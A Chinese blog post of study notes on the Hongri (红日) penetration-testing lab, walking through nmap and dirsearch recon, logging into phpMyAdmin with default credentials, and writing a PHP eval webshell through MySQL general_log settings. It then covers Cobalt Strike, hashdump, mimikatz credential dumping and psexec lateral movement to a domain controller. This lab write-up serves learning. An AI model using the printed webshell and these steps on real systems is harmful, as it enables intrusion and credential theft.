红日靶场学习笔记【1】

红日靶场学习笔记【1】

文章目录

  • 前言
  • 一、靶场环境简介
  • 二、外网打点
    • 1.信息搜集
    • 2.getshell
  • 三、内网渗透
    • 信息搜集
    • 横向渗透
  • 总结

前言

这篇文章主要记录一下我玩红日靶场(1)的一些过程以及在这期间学习到的一些东西


一、靶场环境简介

攻击机:一台vps、一台kali、一台win10

域内主机 网卡
win7(域成员) 192.168.241.130(NAT,自己主机上用来NAT,最好使用桥接)、192.168.52.143(仅主机、内网)
win2003(域成员) 192.168.52.141(仅主机、内网)
win2008(域控) 192.168.52.138(仅主机、内网)

二、外网打点

1.信息搜集

首先,假设我们只知道开启web服务的主机的ip地址是192.168.241.130,但是不知到开启服务的端口,因此先用nmap来搜集开放的端口

在这里插入图片描述

可以看到80端口开启了http服务,访问192.168.241.130:80
在这里插入图片描述
这个页面是一个主页面,应该还存在其他页面,尝试使用dirsearch扫描目录
image-20220327173446016

可以看到存在phpmyadmin

2.getshell

访问phpmyadmin页面,使用root、root登录

在这里插入图片描述

首先进入phpmyadmin想到可以使用into_outfile的方式上传shell,因此要查看是否具有权限
image-20220327174347128

可以看到并不具有权限,因此使用另一种方式,通过日志上传shell,可以用到以下命令

SET GLOBAL general_log = ON;//将日志打开
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php';//日志的路径
select '<?php eval ($_POST[hack]);?>'//查找这个代码,查询情况写入日志
image-20220327175025820

上传成功使用蚁剑连接

image-20220327175302443

成功连接。

到此已经成功拿下了开启web服务的这台主机。

三、内网渗透

信息搜集

我这里主要使用CS工具来进行内网渗透。首先在CS上生成后门

image-20220327180055623

通过上面的蚁剑上传这个后门
image-20220327180158930

通过蚁剑运行这个后门,在CS上上线这台主机
image-20220327180416751

接下来进行内网的信息搜集,使用shell whoami 命令查看权限
image-20220329150436462

查看该主机是否存在域
image-20220329150521651

查看域的一些情况
image-20220329150634359

使用命令net view ,找到域中存活的其他主机ip
image-20220329145735077

横向渗透

首先使用getsystem提权

红日靶场学习笔记【1】

使用hashdump抓取凭据,由于hashdump需要很高的权限,因此上一步进行了提取。hashdump抓取的凭据是为了下一步使用mimikatz抓取域内的密码做准备
红日靶场学习笔记【1】

使用logonpasswds调用mimikatz
image-20220329151832553

可以看到抓取到了域控的密码,接下来通过psexec登陆到OWA所在的域控。
第一步,先创建SMB监听,我这里要使用win7这台主机作为跳板机所以需要SMB监听
image-20220329161110797

第二步,派生一个新的SMB会话
image-20220329161139697

第三步,使用派生的SMB会话作为跳板机,运行psexec进行横向移动
image-20220329161440437

拿到了域控,由于这里域控密码直接拿到了,因此可以使用这个账号密码去登录域内任意一台主机。

总结

这是我第一次在csdn上写学习笔记,如果你们看到了请原谅其中写的不好的内容,谢谢大家。

                       

点击阅读全文

上一篇 2023年 6月 15日 am10:52
下一篇 2023年 6月 15日 am11:07